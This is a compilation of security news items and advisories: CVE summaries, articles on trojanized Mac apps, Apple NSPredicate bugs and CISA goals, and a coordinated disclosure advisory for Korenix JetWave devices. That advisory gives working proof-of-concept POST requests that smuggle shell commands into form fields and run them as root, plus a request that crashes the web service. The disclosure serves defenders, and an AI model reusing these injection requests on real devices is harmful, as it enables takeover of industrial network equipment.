In the Linux kernel before 6.1.13, there is a double free in net/mpls/af_mpls.c upon an allocation failure (for registering the sysctl table under a new location) during the renaming of a device.

CVE-2023-26545

By Owais Sultan
The AI software market has rapidly grown over the past few years. And, based on expert forecasts, it’s…
This is a post from HackRead.com Read the original post: 3 Ways Artificial Intelligence Is Transforming the Stock Market Landscape (and Making It More Secure)

The AI software market has rapidly grown over the past few years. And, based on expert forecasts, it’s not slowing down. According to Statista, the size of the AI software market is predicted to reach a whopping $126 billion by 2025, which is more than 12x what it was in 2018.

And while (at least right now) the majority of the world’s population sees AI as a fun way to generate images they can show off on social media, for investors, artificial intelligence comes with much more impactful benefits.

If you’ve ever wondered whether AI could genuinely transform the stock market landscape or make it more secure, the following are the changes that are already happening.

**Building More Profitable Stock Portfolios**

One of the most prominent advantages of using AI for trading is speed. An artificial intelligence piece of software can scrape the internet in search of information in a matter of minutes. But even more impressively, it can process all that information in the blink of an eye — something that would take humans hours to do equally thoroughly.

For this reason, AI has the potential to aid traders in making quicker investing decisions. And, considering how time-sensitive successful trading can be, this is a huge benefit.

But is AI, in itself, enough to aid traders in building more profitable stock portfolios? Well, as of right now, it’s not. 

These days, making sound investing choices still requires extensive insights, experience, and a bit of human touch. That’s why the best way of utilizing AI is to combine it with other trustworthy stock market investing tools. Nonetheless, the future is guaranteed to see an advancement in artificial intelligence software. In a few years, AI solutions _might_ be enough to inform solid, risk-proof investment decisions.

**Fraud Detection**

Another highly-impactful effect of employing AI solutions in finance is that this tech could allow organizations to protect themselves from an ever-growing rate of cyber threats. In fact, AI can be so competent at detecting and flagging irregular and malicious trading activity that Nasdaq started applying it to the U.S. stock market in 2019.

Of course, considering that the development of effective security-oriented AI solutions _is_ still expensive, it’s safe to expect the trend to be slow on the uptake. But it is safe to say that, in the future, more and more financial organizations will be starting to implement AI solutions in their fraud detection and security systems to minimize risk and maximize their security.

**Improved Customer Service**

One unexpected way AI is transforming the stock market landscape is by making communication between financial service providers and their customers vastly less complicated and more straightforward.

In the past, clients who had any account queries or required technical data had to get in touch with a customer service representative, who would then have to collect and send that data. But now, these requests can be dealt with almost momentarily, mainly thanks to the speed with which AI can conduct similar tasks.

With artificial intelligence software, a simple request can be met in minutes without relying on excessive employee involvement. And best of all, the results are immediately felt, as operational costs are vastly reduced. The speed with which matters are taken care of also results in a significant improvement in customer satisfaction rates. 

Considering that both of these factors play parts in securing the future of any financial institution, it’s safe to say that the role of AI in improving customer service is tremendous.

**Final Thoughts**

Artificial intelligence solutions that have the potential of transforming (and securing) the stock market landscape are not yet at their peak level. Realistically speaking, we still have a decade or so to go before we can say that we’ve successfully changed the world of finance.

However, we can say with absolute certainty that the change _is_ coming. And we can rest assured that it’s going to be positive.

What remains to be seen is how small and mid-size organizations will cope with developing and implementing AI in their workflows — whether they’ll go the custom route or pull the trigger and share solutions for the sake of mutual prosperity. 

1.  How to use AI in cybersecurity?
2.  Incorporating machine learning in data mapping
3.  Using Machine Learning for content moderation?
4.  Cybersecurity trends affecting cybersecurity stocks
5.  Google Vertex AI Vision: Revolutionizing E-Commerce?

Owais takes care of Hackread's social media from the very first day. At the same time He is pursuing for chartered accountancy and doing part time freelance writing.

3 Ways Artificial Intelligence Is Transforming the Stock Market Landscape (and Making It More Secure)

By Deeba Ahmed
All malicious apps for macOS identified by researchers were uploaded to The Pirate Bay by a user called "wtfisthat34698409672."
This is a post from HackRead.com Read the original post: Cryptojackers Deploy Trojanized Mac Apps on The Pirate Bay

It simply goes to show that users should never download software from a third-party website or marketplace.

The cybersecurity researchers at Jamf discovered that cybercriminals are trojanizing legitimate Mac software apps with malware and uploading them to **The Pirate Bay** and other pirated software sites, where users download them and unknowingly infect their devices. The attackers use XMRig cryptojacking malware to execute the XMRig utility.

For your information, **XMRig** is a command-line cryptominer. It isn’t new on Mac, as Trend Micro **analyzed** a sample in February 2020. This tool is used for legitimate purposes, but its open-source, adaptable design has made it a popular choice among threat actors.

The newly discovered XMRig implementation was disguised as **Final Cut Pro**, Apple’s video editing software. Attackers used the Invisible Internet Project (I2P) in both iterations of XMRig for outbound communication, raising confusion about whether the infections were connected or part of something larger.

The malicious version of Final Cut Pro is unauthorized by Apple. It executes XMRig in the background. When it wasn’t initially dubbed as malicious by any security mechanism on VirusTotal, from Jan 2023 onwards multiple vendors detected the malware. Still, most of the malicious apps remain undetected.

Researchers from Jamf searched for the **malware source on The Pirate Bay** and found one with a matching hash to the trojanized version and a series of Apple Mac apps, including Logic Pro and Photoshop.

It is worth noting that all apps were uploaded to The Pirate Bay by the user called “wtfisthat34698409672.” Moreover, they found numerous versions of Final Cut Pro.

All malicious apps for macOS have been uploaded by “wtfisthat34698409672.” (Screenshot credit: Jamf)

In a **blog post**, researchers said that,

> “We suspected that the Mach-O sample arrived packaged in a DMG (an Apple image format used to compress installers) for Adobe Photoshop CC 2019 v20.0.6. However, the parent file was not successfully sourced.”
> 
> Jamf

Further probing revealed three generations of malware—the first generation started in August 2019 and was a standard malware implementation. The second generation started in April 2021 and wasn’t detected by **VirusTotal** until February 13, 2023. This version was different as there were additional hidden files, but no persistence mechanism was noted.

Instead, the malware opened with the app and stopped functioning when the app was closed. The third generation had greater stealth features, as there weren’t any hidden executables, but only one large binary with base64-encoded components and **LZMA compression**.

New versions of these malicious Mac apps started appearing on The Pirate Bay within just 24 hours of Apple’s app update releases and were disguised as legitimate processes.

Researchers state that this isn’t a typical **malware campaign** and is more like a methodology for delivering malware. Still, users should beware of trojanized apps and avoid downloading software from unknown sources.

1.  **YTStealer Malware Hijacking YouTube Channels**
2.  **Famous movies spread malware through torrents**
3.  **Torrent uploader CracksNow spreading ransomware**
4.  **BHUNT malware uses cracked software to steal crypto**
5.  **KryptoCibule malware uses torrent sites to steal crypto**

Cryptojackers Deploy Trojanized Mac Apps on The Pirate Bay

Debian Linux Security Advisory 5360-1 - Xi Lu discovered that missing input sanitising in Emacs (in etags, the Ruby mode and htmlfontify) could result in the execution of arbitrary shell commands.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5360-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : emacsCVE ID         : CVE-2022-48337 CVE-2022-48338 CVE-2022-48339Xi Lu discovered that missing input sanitising in Emacs (in etags, theRuby mode and htmlfontify) could result in the execution of arbitraryshell commands.For the stable distribution (bullseye), these problems have been fixed inversion 1:27.1+1-3.1+deb11u2.We recommend that you upgrade your emacs packages.For the detailed security status of emacs please refer toits security tracker page at:https://security-tracker.debian.org/tracker/emacsFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP34lMACgkQEMKTtsN8TjZkzg//UZrLYSB1sUOTzzBTq5vTl9rPpE0pKzISJV5xiuSRKr5Et9yK/ekWXEIaC49PH1Bm+xp9t8iN6xZ3KAj4fsss3zaZpi90l1yEQtL3em5aJvK1pY4e7VTrw+0xI0urydKdmxC9POEm5NeDNg2GZ7XM930fa3SzYdmAzt3YRk8KaD10GBU6I27X1xSAa+5B3CNnORPmXKNyLZLVDZpQTqdwqH0bhZzI+TL9kbE6mlUY7xr+BAbmBA/gD57VYtXxCFxDRXyQWGn4EC6w9QVld0kEiVgalsOcljtAbr+WtR813adpd4nUj6zzn8hHstN5ONb9pJ69Zv5OBntBUQm+QexB5nuMGEf4xpXKBPm0I3xOVjnMx1pnijWk8V5iM3ackzbrq0DFz7Zyhwoa3MJmwMuYsfQJgO6iCV+D0ZUMeaJfkrsxXWssgqQeMOx9BGR44TAabl6MaL5ZovhmQdPq+oYiCzphEO1dhdQFdeOn0x9mZWIKFa0ZdIDbVs4OJ0T9iNeUb6BoTTuIma9RkvLVcRNihbhTl0q+0+fks3dq9Rb5NbEsN32s3XutWgsH8JtRS3QkZ2GBywIp1hxyJMxLI9Nv5AOlYMxwchFbYReJvOe2aJQY/8BwBLLKiKmRxNmrjCDCS0ZHcMES35/VCuOkks7g6JDyrgoND6hJg2VjDvOxWTY==4k8C-----END PGP SIGNATURE-----

Debian Security Advisory 5360-1

With the right kind of exploit, there's hardly any function, app, or bit of data an attacker couldn't access on your Mac, iPad, or iPhone.

A new class of bugs in Apple's iOS, iPadOS, and macOS has been uncovered, researchers say, that could allow an attacker to escalate privileges and make off with everything on a targeted device.

This new class could "allow bypassing code signing to execute arbitrary code in the context of several platform applications," Trellix researcher Austin Emmitt wrote in a blog post on Feb. 21, "leading to escalation of privileges and sandbox escape on both macOS and iOS."

Were an attacker to exploit these vulnerabilities, they could potentially gain access to a victim's photos, messages, call history, location data, and all kinds of other sensitive data, even the device's microphone and camera. They could also use their access to wipe a device altogether.

The vulnerabilities in this class range from medium to high severity, with CVSS ratings between 5.1 and 7.1. Apple grouped them into two CVEs: CVE-2023-23530 and CVE-2023-23531. There's no indication that they've been exploited in the wild.

**NSPredicate: A Fresh Cyberattack Vector**

The cyber failure in this case arises from NSPredicate, a class that enables app developers to filter lists of objects on a device. This "innocent-looking class," as Emmitt put it, is much deeper than it may appear at first glance. "In reality, the syntax of NSPredicate is a full scripting language."

In other words, through NSPredicate, "the ability to dynamically generate and run code on iOS had been an official feature this whole time," he explained.

In one proof-of-concept, Trellix found that an attacker could use NSPredicate to execute code in "coreduetd" or "contextstored," root-level processes that allows entryway into parts of the machine such as the calendar, address book, and photos.

In another case, the researchers found an NSPredicate vulnerability in the UIKitCore framework on the iPad. Here, a malicious app would be able to execute code inside SpringBoard, the app that manages the device's home screen. Getting into SpringBoard could cause any number of compromises to just about any kind of data a user stores on the phone, or allow an attacker to simply erase the device altogether.

The silver lining for this new class of vulnerabilities is that they require an attacker already to have access to a target device. Gaining access is typically the easy part, with methods like phishing and other social engineering being so widely effective, but it also means there are steps anybody can take to harden their defenses.

"Individuals should continue to stay vigilant against social engineering and phishing attacks," McKee says, "while also ensuring they only install applications from a known trusted source. Businesses are encouraged to ensure they are doing the proper product security testing on any third-party applications they use in their infrastructure and are monitoring device logs for any suspicious or unusual activity."

**Patching Might Not Be the End of the Story**

If they haven't already, Apple users should update their system software, as the newest versions include fixes for the vulnerabilities so described. That doesn't mean, however, that vulnerabilities of this kind won't pop up again.

Emmitt highlighted in the blog post how NSPredicate had already been exposed by a security researcher back in 2019, then exploited by NSO Group in 2021, in an espionage attack targeting a Saudi activist. Apple attempted to close the hole but evidently didn't finish the job, paving the way for the new discoveries.

"Elimination of a bug class is often extremely difficult to accomplish as it often requires not only code changes but education of developers," explains Doug McKee, director of vulnerability research for Trellix. "Like all bug classes, unless a mitigation is put into place which would eliminate the entire class, it would be expected that more similar vulnerabilities would be found in the future."

**The Myth of Apple’s Superior Security?**

The findings are another puncture wound in the perception that Apple devices are somehow inherently more secure than PCs or Android devices.

"Since the first version of iOS on the original iPhone," Emmitt explained, "Apple has enforced careful restrictions on the software that can run on their mobile devices."

The devices do this with code signing. Functioning somewhat like a bouncer at a club, iPhone only allows an application to run if it has been cryptographically signed by a trusted developer. If any entity — a developer, hacker, etc. — wishes to run code on the machine, but they're not "on the list," they'll be shut out. And "as macOS has continually adopted more features of iOS," Emmitt noted, "it has also come to enforce code signing more strictly."

As a result of its strict policies, Apple has earned a reputation in some corners for being particularly cyber secure. Yet that extra stringency can only extend so far.

"I think that there is a misconception when it comes to Apple devices," says Mike Burch, director of application security for Security Journey. "The assumption by the public is that they are more secure than other systems. It is true that Apple has many security features and is more stringent about what applications it allows on its devices. Still, they are just as susceptible to vulnerabilities being introduced to their devices as any other provider."

'New Class of Bugs' in Apple Devices Opens the Door to Complete Takeover

The All in One SEO Pack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 4.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with Administrator role or above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-0585: Updates.php in all-in-one-seo-pack/tags/4.2.9/app/Common/Main – WordPress Plugin Repository

CISA's recently released cybersecurity performance goals can help lower risk and thwart the impact of cyberattacks.

The message is simple, but important: Cover the basics.

In its recently released cybersecurity performance goals, the Cybersecurity and Infrastructure Security Agency (CISA) stressed the importance of taking steps to maintain computer system health and improve online security. The goals are important reminders of risk in the sectors the agency defines as critical infrastructure, because cyberattacks can disrupt and even shut down services that impact daily life. This occurred in the energy sector when Colonial Pipeline was attacked, and in the utility sector with an attack on a dam in New York.

The agency's goals, designed to supplement the NIST Cybersecurity Framework, establish a common set of fundamental cybersecurity practices that lower risk and thwart the impact of cyberattacks on critical infrastructure organizations. For example, there must be an acceptable level of security for customers' accounts so that unsuccessful logins are detected, future attempts are prevented, and suspicious activity is reported.

Another goal, device security, advocates an approval process before new hardware or software can be installed on a system; it also advises managing the inventory of system assets so administrators can detect and respond to vulnerabilities. Related to device security is the data security goal, which stresses the importance of collecting log data and securing sensitive information with encryption.

**Individual Users Represent the Greatest Vulnerability**

While these basic best practices are familiar to all practitioners in the cybersecurity industry, CISA elevated them because it recognizes that individual users represent the greatest vulnerability to networks. One lapse in cyber hygiene can have a lasting impact and cripple citizen services. Even though cyber threats are invisible, they can noticeably disrupt the food supply, water systems, healthcare, and financial systems with long-term consequences. CISA's promotion of the guidelines shows the need for continuous awareness of the threats in cyberspace, and the importance of avoiding the complacency that can lead to an operational shutdown.

Attackers employ social engineering scams to manipulate individual users into clicking suspicious links, as happened with the Operation Sharpshooter attack that infected 87 critical infrastructure organizations. Through these infected devices, hackers could have gained access to Internet-enabled industrial control systems (ICS) at manufacturing facilities or wastewater treatment plants, causing further disruption. Unlike home or enterprise networks in which restoring the network will usually put you back in operation, an interruption of a wastewater treatment plant may involve days or weeks of work to clean filters and incrementally bring operational functions back online.

In addition to the disruption to operations, there is the financial cost that bears consideration: In 2022, 28% of critical infrastructure organizations experienced a destructive or ransomware attack, costing an average of $4.82 million per incident.

CISA recognizes the state of ICS vulnerabilities, and it has performance goals for protecting those systems, too. Because many critical infrastructure facilities are privately owned, government and industry are working together to coordinate improvements in the security posture, and CISA has a leading role. ICS represents a particular challenge due to the complexity and age of many ICS systems and the underlying operational technology, however, it underscores the importance of overall cybersecurity with four reasons to embrace its guidelines:

*   Many organizations have not adopted fundamental security protections
*   Small and medium-sized organizations are left behind
*   Lack of consistent standards and cyber maturity across critical infrastructure sectors
*   Cybersecurity often remains overlooked and under resourced

As the Internet of Things (IoT) connects more devices, the attack surface of critical infrastructure will increase, likely raising the cost of successful attacks. In health care, which CISA considers critical infrastructure, Internet-enabled equipment poses a risk. If a hospital's systems are well protected, but a supplier didn't secure the code in its dialysis or magnetic resonance imaging machines, the hospital becomes vulnerable.

Implementing CISA's new cybersecurity goals takes a dedicated investment, business process improvement, and regular audit to improve cyber defenses. As attacks on hardware, software, and data become more sophisticated, so too must the defenses with continuous modernization of cyber technology. It requires collaboration between CISA and infrastructure providers that will benefit from the agency's mission of promoting cybersecurity awareness, defending against threats, and striving for a more secure and resilient infrastructure. CISA's emphasis on foundational steps to take for cybersecurity are foundational. It may seem like a step backward, but it's actually a consequential leap forward.

To Safeguard Critical Infrastructure, Go Back to Basics

A CWE-117: Improper Output Neutralization for Logs vulnerability exists that could cause the misinterpretation of log files when malicious packets are sent to the Geo SCADA server's database web port (default 443). Affected products: EcoStruxure Geo SCADA Expert 2019, EcoStruxure Geo SCADA Expert 2020, EcoStruxure Geo SCADA Expert 2021(All Versions prior to October 2022), ClearSCADA (All Versions)

Share Price 

Item count in cart is 0 My Products Item count in cart is 0 My Documents opens in new Window Login/Register opens in new Window

0 item count of documents is

Share Price  Item count in cart is 0 My Products My Documents opens in new Window Login/Register opens in new Window

Welcome to the Schneider Electric corporate Website

ENGLISH | FRENCH

arrow2\_left

Back

*   Support
*   Product Documentation & Software downloads

Date : 10/02/2023 Type : Security and Safety Notice  

Languages : English Version : 1.0

Reference : SEVD-2023-045-01

  

Date : 10/02/2023 Type : Security and Safety Notice Languages : English Version : 1.0 Reference : SEVD-2023-045-01  

Download (.zip)

Files

File Name

SEVD-2023-045-01

action\_download\_stroke

PDF (300.5 kb)

sevd-2023-045-01

action\_download\_stroke

JSON (13.8 kb)

Document title Date Version Languages

Document title

Product Ranges: EcoStruxure™ Geo SCADA Expert, EcoStruxure™ Machine SCADA Expert

 

**Need help?**

**Start here!**

Find answers now. Search for a solution on your own, or connect with one of our experts.

**Contact Support**

Reach out to our customer care team to receive more information, technical support, assistance with complaints and more.

**Where to buy?**

Easily find the nearest Schneider Electric distributor in your location.

**Browse FAQ**

Get answers you need by browsing topic-related Frequently Asked Questions (FAQ).

**Contact Sales**

Start your sales inquiry online and an expert will connect with you.

CVE-2023-0595: Security Notification - EcoStruxure Geo SCADA Expert Security | Schneider Electric

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 17 and Feb. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed...

Threat Round up for February 17 to February 24

Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.

**Title**: Multiple Vulnerabilities  
**Product**: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3  
**Vulnerable version**: See “Vulnerable Versions”  
**Fixed version**: See “Solution”  
**CVE**: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296  
**Impact**: High  
**Homepage**: https://korenix.com  
**Found**: 2022-11-28

_Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities._

**Vendor description**

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
\[…\]  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:  
https://www.korenix.com/en/about/index.aspx?kind=3

**Vulnerable versions**

The following firmware versions have been found to be vulnerable by CyberDanube:

*   Korenix JetWave4221 HP-E <= V1.3.0
*   Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

*   Korenix JetWave 2212G V1.3.T
*   Korenix JetWave 2212X/2112S V1.3.0
*   Korenix JetWave 2211C < V1.6
*   Korenix JetWave 2411/2111 < V1.5
*   Korenix JetWave 2411L/2111L < V1.6
*   Korenix JetWave 2414/2114 < V1.4
*   Korenix JetWave 2424 < V1.3
*   Korenix JetWave 2460 < V1.6

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)  
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

**Proof of Concept****1) Authenticated Command Injection**

1.a) – CVE-2023-23294  
The command “touch /tmp/poc” was injected to the system by using the following  
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/mgmtsaveconf.asp  
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45  
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip\_address=192.168.1.1&file\_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp\_action=load&tftp\_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295  
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1  
Host: 172.16.0.38  
Content-Type: application/x-www-form-urlencoded  
Connection: close  
Referer: 172.16.0.38  
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb  
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

**2) Authenticated Denial of Web-Service (CVE-2023-23296)**

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/toolping.asp  
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356  
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /  
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary  
Usage: rm \[OPTION\]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to  
indicate that all following arguments are non-options.

Options:  
\-i always prompt before removing each destination  
\-f remove existing destinations, never prompt  
\-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed  
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Owner of these products are suggested to update to the following versions:

*   Korenix JetWave 4221 HP-E V1.4.0
*   Korenix JetWave 2212G V1.10
*   Korenix JetWave 2212X/2112S V1.11
*   Korenix JetWave 2211C V1.6
*   Korenix JetWave 2411/2111 V1.5
*   Korenix JetWave 2411L/2111L V1.6
*   Korenix JetWave 2414/2114 V1.4
*   Korenix JetWave 2424 V1.3
*   Korenix JetWave 2460 V1.6
*   Korenix JetWave 3220/3420 V3 V1.7

**Workaround****Recommendation**

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

**Contact Timeline**

*   2022-12-05: Contacting Beijer Electronics Group via
*   2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
*   2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that  
    not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other  
    products have been patched.
*   2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
*   2023-02-13: Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

Tag

#mac